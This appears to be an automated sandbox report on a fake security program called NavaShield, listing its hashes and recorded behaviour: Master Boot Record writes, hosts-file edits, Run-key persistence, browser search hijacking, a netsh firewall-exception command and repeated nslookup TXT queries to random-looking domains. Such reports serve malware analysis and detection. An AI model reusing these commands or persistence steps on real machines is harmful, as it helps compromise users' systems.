Overview
overview
10Static
static
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
7ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
7ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
6ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
9ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
7ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10Resubmissions
03-07-2024 22:59
240703-2yn7wszhlp 1003-07-2024 16:13
240703-tn93lsyglf 1003-07-2024 16:11
240703-tm84xsyfma 1010-05-2024 16:25
240510-tw1h5shh47 1024-08-2023 11:16
230824-nda8msdf8z 10Analysis
-
max time kernel
1806s -
max time network
1695s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
22-11-2020 06:42
Static task
static1
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral24
Sample
Endermanch@NavaShield(1).exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
General
-
Target
-
Size
6.1MB
-
MD5
04155ed507699b4e37532e8371192c0b
-
SHA1
a14107131237dbb0df750e74281c462a2ea61016
-
SHA256
b6371644b93b9d3b9b32b2f13f8265f9c23ddecc1e9c5a0291bbf98aa0fc3b77
-
SHA512
6de59ebbc9b96c8a19d530caa13aa8129531ebd14b3b6c6bbb758426b59ed5ab12483bfa232d853af2e661021231b4b3fcc6c53e187eeba38fa523f673115371
Score
9/10
Malware Config
Signatures
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Enumerates VirtualBox registry keys 2 TTPs
-
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 4 IoCs
Processes:
description ioc Process File created C:\Windows\System32\drivers\etc\hosts [email protected] File opened for modification C:\Windows\System32\drivers\etc\hosts [email protected] File opened for modification C:\Windows\system32\drivers\etc\hosts [email protected] File created C:\Windows\system32\drivers\etc\host_new [email protected] -
Sets file execution options in registry 2 TTPs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run [email protected] Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run [email protected] Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Internet Security Guard = "\"C:\\ProgramData\\80279\\IS07a.exe\" /s /d" [email protected] -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\Nod\ [email protected] -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description ioc Process File opened (read-only) \??\J: [email protected] File opened (read-only) \??\K: [email protected] File opened (read-only) \??\V: [email protected] File opened (read-only) \??\G: [email protected] File opened (read-only) \??\H: [email protected] File opened (read-only) \??\Q: [email protected] File opened (read-only) \??\R: [email protected] File opened (read-only) \??\T: [email protected] File opened (read-only) \??\Y: [email protected] File opened (read-only) \??\O: [email protected] File opened (read-only) \??\P: [email protected] File opened (read-only) \??\M: [email protected] File opened (read-only) \??\U: [email protected] File opened (read-only) \??\W: [email protected] File opened (read-only) \??\X: [email protected] File opened (read-only) \??\E: [email protected] File opened (read-only) \??\I: [email protected] File opened (read-only) \??\N: [email protected] File opened (read-only) \??\S: [email protected] File opened (read-only) \??\Z: [email protected] File opened (read-only) \??\F: [email protected] File opened (read-only) \??\L: [email protected] -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
description ioc Process File opened for modification \??\PhysicalDrive0 [email protected] -
Processes:
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%" [email protected] Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\IIL = "0" [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no" [email protected] Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\BrowserEmulation [email protected] Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0" [email protected] Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\SearchScopes [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=7&q={searchTerms}" [email protected] Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\ltHI = "0" [email protected] Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\ltTST = "28117" [email protected] Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1" [email protected] Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} [email protected] -
Modifies data under HKEY_USERS 6 IoCs
Processes:
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" [email protected] Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes [email protected] Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" [email protected] Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes [email protected] Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" [email protected] Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes [email protected] -
Modifies registry class 15 IoCs
Processes:
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Classes\[email protected] [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID [email protected] Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF} [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Classes\[email protected]\Clsid [email protected] Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software\Microsoft [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "[email protected]" [email protected] Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\[email protected]\ = "Implements DocHostUIHandler" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32 [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\[email protected]\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}" [email protected] Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software\Microsoft\Internet Explorer [email protected] -
Suspicious behavior: EnumeratesProcesses 12090 IoCs
Processes:
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
mofcomp.exeAUDIODG.EXEdescription pid Process Token: SeSecurityPrivilege 2616 mofcomp.exe Token: 33 2996 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2996 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid Process 676 [email protected] 676 [email protected] -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid Process 676 [email protected] 676 [email protected] -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
pid Process 676 [email protected] 676 [email protected] 676 [email protected] 676 [email protected] -
Suspicious use of WriteProcessMemory 78 IoCs
Processes:
description pid Process procid_target PID 676 wrote to memory of 2616 676 [email protected] 77 PID 676 wrote to memory of 2616 676 [email protected] 77 PID 676 wrote to memory of 2616 676 [email protected] 77 PID 676 wrote to memory of 4088 676 [email protected] 78 PID 676 wrote to memory of 4088 676 [email protected] 78 PID 676 wrote to memory of 4088 676 [email protected] 78 PID 676 wrote to memory of 3152 676 [email protected] 81 PID 676 wrote to memory of 3152 676 [email protected] 81 PID 676 wrote to memory of 3152 676 [email protected] 81 PID 676 wrote to memory of 1944 676 [email protected] 84 PID 676 wrote to memory of 1944 676 [email protected] 84 PID 676 wrote to memory of 1944 676 [email protected] 84 PID 676 wrote to memory of 744 676 [email protected] 86 PID 676 wrote to memory of 744 676 [email protected] 86 PID 676 wrote to memory of 744 676 [email protected] 86 PID 676 wrote to memory of 640 676 [email protected] 88 PID 676 wrote to memory of 640 676 [email protected] 88 PID 676 wrote to memory of 640 676 [email protected] 88 PID 676 wrote to memory of 4076 676 [email protected] 90 PID 676 wrote to memory of 4076 676 [email protected] 90 PID 676 wrote to memory of 4076 676 [email protected] 90 PID 676 wrote to memory of 3584 676 [email protected] 92 PID 676 wrote to memory of 3584 676 [email protected] 92 PID 676 wrote to memory of 3584 676 [email protected] 92 PID 676 wrote to memory of 1184 676 [email protected] 94 PID 676 wrote to memory of 1184 676 [email protected] 94 PID 676 wrote to memory of 1184 676 [email protected] 94 PID 676 wrote to memory of 396 676 [email protected] 96 PID 676 wrote to memory of 396 676 [email protected] 96 PID 676 wrote to memory of 396 676 [email protected] 96 PID 676 wrote to memory of 2732 676 [email protected] 98 PID 676 wrote to memory of 2732 676 [email protected] 98 PID 676 wrote to memory of 2732 676 [email protected] 98 PID 676 wrote to memory of 1596 676 [email protected] 100 PID 676 wrote to memory of 1596 676 [email protected] 100 PID 676 wrote to memory of 1596 676 [email protected] 100 PID 676 wrote to memory of 1456 676 [email protected] 103 PID 676 wrote to memory of 1456 676 [email protected] 103 PID 676 wrote to memory of 1456 676 [email protected] 103 PID 676 wrote to memory of 2152 676 [email protected] 105 PID 676 wrote to memory of 2152 676 [email protected] 105 PID 676 wrote to memory of 2152 676 [email protected] 105 PID 676 wrote to memory of 184 676 [email protected] 107 PID 676 wrote to memory of 184 676 [email protected] 107 PID 676 wrote to memory of 184 676 [email protected] 107 PID 676 wrote to memory of 748 676 [email protected] 109 PID 676 wrote to memory of 748 676 [email protected] 109 PID 676 wrote to memory of 748 676 [email protected] 109 PID 676 wrote to memory of 3468 676 [email protected] 111 PID 676 wrote to memory of 3468 676 [email protected] 111 PID 676 wrote to memory of 3468 676 [email protected] 111 PID 676 wrote to memory of 3176 676 [email protected] 113 PID 676 wrote to memory of 3176 676 [email protected] 113 PID 676 wrote to memory of 3176 676 [email protected] 113 PID 676 wrote to memory of 3412 676 [email protected] 115 PID 676 wrote to memory of 3412 676 [email protected] 115 PID 676 wrote to memory of 3412 676 [email protected] 115 PID 676 wrote to memory of 1528 676 [email protected] 117 PID 676 wrote to memory of 1528 676 [email protected] 117 PID 676 wrote to memory of 1528 676 [email protected] 117 PID 676 wrote to memory of 3184 676 [email protected] 119 PID 676 wrote to memory of 3184 676 [email protected] 119 PID 676 wrote to memory of 3184 676 [email protected] 119 PID 676 wrote to memory of 1304 676 [email protected] 121 PID 676 wrote to memory of 1304 676 [email protected] 121 PID 676 wrote to memory of 1304 676 [email protected] 121 PID 676 wrote to memory of 2924 676 [email protected] 123 PID 676 wrote to memory of 2924 676 [email protected] 123 PID 676 wrote to memory of 2924 676 [email protected] 123 PID 676 wrote to memory of 1780 676 [email protected] 125 PID 676 wrote to memory of 1780 676 [email protected] 125 PID 676 wrote to memory of 1780 676 [email protected] 125 PID 676 wrote to memory of 1428 676 [email protected] 127 PID 676 wrote to memory of 1428 676 [email protected] 127 PID 676 wrote to memory of 1428 676 [email protected] 127 PID 676 wrote to memory of 348 676 [email protected] 129 PID 676 wrote to memory of 348 676 [email protected] 129 PID 676 wrote to memory of 348 676 [email protected] 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\[email protected]"C:\Users\Admin\AppData\Local\Temp\[email protected]"1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Checks for any installed AV software in registry
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\Wbem\mofcomp.exemofcomp "C:\Users\Admin\AppData\Local\Temp\6214.mof"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\SysWOW64\netsh.exenetsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\[email protected]" "Internet Security Guard" ENABLE2⤵PID:4088
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt iqqzghpraj1496pv.com 8.8.8.82⤵PID:3152
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt iqqzghpraj1496pv.net 8.8.8.82⤵PID:1944
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt iqqzghpraj1496pv.com 208.67.222.2222⤵PID:744
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt iqqzghpraj1496pv.net 208.67.222.2222⤵PID:640
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt iqqzghpraj1496pv.com 8.8.4.42⤵PID:4076
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt iqqzghpraj1496pv.net 8.8.4.42⤵PID:3584
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt iqqzghpraj1496pv.com 208.67.220.2202⤵PID:1184
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt iqqzghpraj1496pv.net 208.67.220.2202⤵PID:396
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt cklt476chlmrzdj.com 8.8.8.82⤵PID:2732
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt cklt476chlmrzdj.net 8.8.8.82⤵PID:1596
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt cklt476chlmrzdj.com 208.67.222.2222⤵PID:1456
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt cklt476chlmrzdj.net 208.67.222.2222⤵PID:2152
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt cklt476chlmrzdj.com 8.8.4.42⤵PID:184
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt cklt476chlmrzdj.net 8.8.4.42⤵PID:748
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt cklt476chlmrzdj.com 208.67.220.2202⤵PID:3468
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt cklt476chlmrzdj.net 208.67.220.2202⤵PID:3176
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt flnstbd952muudj.com 8.8.8.82⤵PID:3412
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt flnstbd952muudj.net 8.8.8.82⤵PID:1528
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt flnstbd952muudj.com 208.67.222.2222⤵PID:3184
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt flnstbd952muudj.net 208.67.222.2222⤵PID:1304
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt flnstbd952muudj.com 8.8.4.42⤵PID:2924
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt flnstbd952muudj.net 8.8.4.42⤵PID:1780
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt flnstbd952muudj.com 208.67.220.2202⤵PID:1428
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -q=txt flnstbd952muudj.net 208.67.220.2202⤵PID:348
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2401⤵
- Suspicious use of AdjustPrivilegeToken
PID:2996
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
3754f8f8abad5bad797085d0717a9766
SHA148d92f36cb721b390e216aa03b27b41f25c563fc
SHA2563c77f5f888d417a7a31284cb8c5e3bdb4d926c4a274cecac8a8b2920659d5927
SHA512c59f322ece53c757767e52fe9bfbc3526a13afe9ec7503e3d1cae683eeb55cbb808a1bce720fd58f97f286756d314124bcf797c2167275e08ed93ba759bf3985